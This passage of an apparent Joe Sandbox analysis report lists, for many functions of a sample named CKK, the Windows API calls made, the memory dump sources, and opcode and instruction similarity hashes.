                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A83840
                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A83850
                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00A83876
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MoveWindow
                                                                                              • String ID: Listbox
                                                                                              • API String ID: 3315199576-2633736733
                                                                                              • Opcode ID: 34e46330fa7e468b31748736033ed0050ad63d89d2f0c7b37ee37c141df33f57
                                                                                              • Instruction ID: 21f6885f69fa76d89ac1cb1f295298902513f7d5716c0c451415b1a69b228618
                                                                                              • Opcode Fuzzy Hash: 34e46330fa7e468b31748736033ed0050ad63d89d2f0c7b37ee37c141df33f57
                                                                                              • Instruction Fuzzy Hash: 3C219272610218BBEF11EF95CC85FBB376EEF89B60F118124F9049B190CA75DC528BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A64A08
                                                                                              • GetVolumeInformationW.KERNEL32 ref: 00A64A5C
                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,00A8CC08), ref: 00A64AD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                              • String ID: %lu
                                                                                              • API String ID: 2507767853-685833217
                                                                                              • Opcode ID: e9310a91c8adbbbb9c060fcb4bd4201f0feda5f78b370e01571e7969b012a307
                                                                                              • Instruction ID: ce61d7182826f85f8b6e3f06628b931404e407ced20c2750d73968fe8b83172b
                                                                                              • Opcode Fuzzy Hash: e9310a91c8adbbbb9c060fcb4bd4201f0feda5f78b370e01571e7969b012a307
                                                                                              • Instruction Fuzzy Hash: 7E316275A00109AFDB10DF94C985EAA7BF8EF48318F1480A5F909DB252D771ED46CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A8424F
                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A84264
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A84271
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: 54ff4fccfe7ba60ea9b6d91b81605306a2f57433050a188944be5e7eba0b42a1
                                                                                              • Instruction ID: acf0fe51c00f50084855f9e834b8c4e7055631fa79709a8c375a2b8c7c12d317
                                                                                              • Opcode Fuzzy Hash: 54ff4fccfe7ba60ea9b6d91b81605306a2f57433050a188944be5e7eba0b42a1
                                                                                              • Instruction Fuzzy Hash: AB110631244209BEEF20AF79CC06FEB3BACEF99B64F110524FA55E2090D671DC219B20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A
                                                                                                • Part of subcall function 00A52DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A52DC5
                                                                                                • Part of subcall function 00A52DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A52DD6
                                                                                                • Part of subcall function 00A52DA7: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00A52DDD
                                                                                                • Part of subcall function 00A52DA7: AttachThreadInput.USER32(00000000,?,00000000), ref: 00A52DE4
                                                                                              • GetFocus.USER32 ref: 00A52F78
                                                                                                • Part of subcall function 00A52DEE: GetParent.USER32(00000000), ref: 00A52DF9
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00A52FC3
                                                                                              • EnumChildWindows.USER32 ref: 00A52FEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                              • String ID: %s%d
                                                                                              • API String ID: 1272988791-1110647743
                                                                                              • Opcode ID: 32740c8cc4a20127391bbc3c4a9e1d2ee30c5e18c2fa45a3c0ef3700e0858c6c
                                                                                              • Instruction ID: 470d286cf46d5c0b26d957d9dcf952f79659e3a5894dda8d237607e459e4ab32
                                                                                              • Opcode Fuzzy Hash: 32740c8cc4a20127391bbc3c4a9e1d2ee30c5e18c2fa45a3c0ef3700e0858c6c
                                                                                              • Instruction Fuzzy Hash: F21190726002096BCF54BFA49D85FED376ABF85316F048075BD099B192DF309A498B70
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$InfoItem$Draw
                                                                                              • String ID: 0
                                                                                              • API String ID: 3227129158-4108050209
                                                                                              • Opcode ID: a05248593185aa31fac637a2d2af44cf49a2009f56b07ebecaff1dca842ac247
                                                                                              • Instruction ID: a0807b43c4bba551e97fabe000c4c0f3d6ff6b33477cf97342a1b09cc2ca6a8f
                                                                                              • Opcode Fuzzy Hash: a05248593185aa31fac637a2d2af44cf49a2009f56b07ebecaff1dca842ac247
                                                                                              • Instruction Fuzzy Hash: C8012D31900218EFDF21AF61EC44BAEBBB5FB45361F1080A9E849D61A1DB308A95DF71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c84c85602c54f8f6eaa68c20e559a6f57d52f9106fb0e612801152eb25e33ca4
                                                                                              • Instruction ID: 1506a161464cd4b7608968979195749c34f19acb951122135504fb4e89b94c14
                                                                                              • Opcode Fuzzy Hash: c84c85602c54f8f6eaa68c20e559a6f57d52f9106fb0e612801152eb25e33ca4
                                                                                              • Instruction Fuzzy Hash: 5FC14975A00206AFCB14CFA8C898EAEB7B5FF48315F218598E905EF251D731ED45DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInitInitializeUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 1998397398-0
                                                                                              • Opcode ID: 25c8582986914e8660ce84ead8512f76da961e4b8bc94c0f7e6224ec1789e859
                                                                                              • Instruction ID: a6d09bac385f5f92107355351aa768daf0749cf07e166f5a763613e616b17f17
                                                                                              • Opcode Fuzzy Hash: 25c8582986914e8660ce84ead8512f76da961e4b8bc94c0f7e6224ec1789e859
                                                                                              • Instruction Fuzzy Hash: 35A16B762043049FCB00DF68C985A2AB7E5FF88714F05C859F98A9B362DB70EE05DB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 00A505F0
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00A50608
                                                                                              • CLSIDFromProgID.OLE32(?,?), ref: 00A5062D
                                                                                              • _memcmp.LIBVCRUNTIME ref: 00A5064E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 314563124-0
                                                                                              • Opcode ID: 6389b93969f815f9118893eed847f2dc8e659679e3b606acf6dc2d9bfdcde6fe
                                                                                              • Instruction ID: 816fb56d95050a6f618a870bd28cea726be86e14a1e23abb26dc33cba634f570
                                                                                              • Opcode Fuzzy Hash: 6389b93969f815f9118893eed847f2dc8e659679e3b606acf6dc2d9bfdcde6fe
                                                                                              • Instruction Fuzzy Hash: B081DC75A00109EFCB04DF94C984EEEB7B9FF89315F204558E916AB250DB71AE4ACF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 14914ac1525d22c8ba11a880f04ea139888f4a5c82cf4feb4123cc37758e8af2
                                                                                              • Instruction ID: 76738888775fa63fce4afb0c3af45c64a16c83b0714432654de06e0662e493fd
                                                                                              • Opcode Fuzzy Hash: 14914ac1525d22c8ba11a880f04ea139888f4a5c82cf4feb4123cc37758e8af2
                                                                                              • Instruction Fuzzy Hash: C3414BB5A00610AFDB21BBFD9D46AFE3AB5EF41370F144235F41AD7192EA3488815762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowRect.USER32(00B95280,?), ref: 00A862E2
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A86315
                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00A86382
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              • Opcode ID: 93bb7a4e145ae36fa0616d0482bf22059bd09157510c5015cd4b9f8bbe977d59
                                                                                              • Instruction ID: 7ad74cb6cd5df90db9cccff5cd639302a5fab733c5fb756de86f22cc4b24b069
                                                                                              • Opcode Fuzzy Hash: 93bb7a4e145ae36fa0616d0482bf22059bd09157510c5015cd4b9f8bbe977d59
                                                                                              • Instruction Fuzzy Hash: 69512B74A00209EFEF10EF68D980AAE7BB5FF45360F108169F9159B2A1D730ED81CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00A71AFD
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A71B0B
                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A71B8A
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A71B94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$socket
                                                                                              • String ID:
                                                                                              • API String ID: 1881357543-0
                                                                                              • Opcode ID: e852264204a7f179d0fc6044fd2ec566a15f6008b7a07cf4c50c416ae376fb76
                                                                                              • Instruction ID: 4fba84986f08c39bbebc11c175482ccfda5dc05a9f020bf11f3d5ff90731e9ee
                                                                                              • Opcode Fuzzy Hash: e852264204a7f179d0fc6044fd2ec566a15f6008b7a07cf4c50c416ae376fb76
                                                                                              • Instruction Fuzzy Hash: 81419F75640204AFE720AF24D886F3A77E5AB84718F54C458FA1A9F3D3D772ED428B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9058434b49310aeecf4b9c71cf32e7f06900c58010449631d2cf09ea4d335572
                                                                                              • Instruction ID: 9b1ab5ee675b1f7485db1ce1db9cb4837d5b818fe9cef5a2c25eeb8f1fdb0026
                                                                                              • Opcode Fuzzy Hash: 9058434b49310aeecf4b9c71cf32e7f06900c58010449631d2cf09ea4d335572
                                                                                              • Instruction Fuzzy Hash: 05411B71A10714BFD724AF3CDD41BAABBF9EB84710F20853AF552DB282D77199418790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A65783
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00A657A9
                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A657CE
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A657FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              • Opcode ID: 6043becea555cec789146bcb32f4ffef698f65c020c1f1da9b43897ecb20fa9e
                                                                                              • Instruction ID: 140c04d4b962faa2bb63cb3e0c40aa131af8ba7aa1c815bc25f04c003eb17557
                                                                                              • Opcode Fuzzy Hash: 6043becea555cec789146bcb32f4ffef698f65c020c1f1da9b43897ecb20fa9e
                                                                                              • Instruction Fuzzy Hash: 25412C35600615DFCB11EF55C544A6DBBF2EF89320B188888F94A9B362CB74FD05CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00A16D71,00000000,00000000,00A182D9,?,00A182D9,?,00000001,00A16D71,8BE85006,00000001,00A182D9,00A182D9), ref: 00A2D910
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A2D999
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A2D9AB
                                                                                              • __freea.LIBCMT ref: 00A2D9B4
                                                                                                • Part of subcall function 00A23820: RtlAllocateHeap.NTDLL(00000000,?,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6,?,009F1129), ref: 00A23852
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: 3bf10d29d728ed21a86d6bda861c472eb4ee9931cf8e36ece575bfc2573daee9
                                                                                              • Instruction ID: 5bd8fc62ab10db51f5769c26db89b901dae04aec221b475cd01f40eb1b2c4e3e
                                                                                              • Opcode Fuzzy Hash: 3bf10d29d728ed21a86d6bda861c472eb4ee9931cf8e36ece575bfc2573daee9
                                                                                              • Instruction Fuzzy Hash: FE31B272A0022AABDF24DF68EC85EAE7BA5EB41310F154178FC04D7251E735CD91CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00A5ABF1
                                                                                              • SetKeyboardState.USER32(00000080), ref: 00A5AC0D
                                                                                              • PostMessageW.USER32 ref: 00A5AC74
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00A5ACC6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 99615611534c8d78342fda9012e9207c3153c9f0db82b58368eb4fac37c97e09
                                                                                              • Instruction ID: dacec92015e37c179b296600f592b103c7b09004bed2819180b0197890d91310
                                                                                              • Opcode Fuzzy Hash: 99615611534c8d78342fda9012e9207c3153c9f0db82b58368eb4fac37c97e09
                                                                                              • Instruction Fuzzy Hash: 9A313930B00318AFEF34CBA48C057FE7BB5BB65322F04431AEC85561D1D37489898762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1352109105-0
                                                                                              • Opcode ID: 887c98396f66af651096bfa54377725c033bb9b0b5d19c2f783d840bbf8dcc60
                                                                                              • Instruction ID: 23c3c873cdc1de87df0ac728ee0c09a8120b2dc802a54a2e85adb257f22ea7c2
                                                                                              • Opcode Fuzzy Hash: 887c98396f66af651096bfa54377725c033bb9b0b5d19c2f783d840bbf8dcc60
                                                                                              • Instruction Fuzzy Hash: 06418E34A05214DFCB11EFA8C894EADBBF5FF4A314F2941A9E8159B261D731E942CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 00A816EB
                                                                                                • Part of subcall function 00A53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A53A57
                                                                                                • Part of subcall function 00A53A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,00A525B3), ref: 00A53A5E
                                                                                                • Part of subcall function 00A53A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00A53A65
                                                                                              • GetCaretPos.USER32(?), ref: 00A816FF
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00A8174C
                                                                                              • GetForegroundWindow.USER32 ref: 00A81752
                                                                                              Memory Dump Source
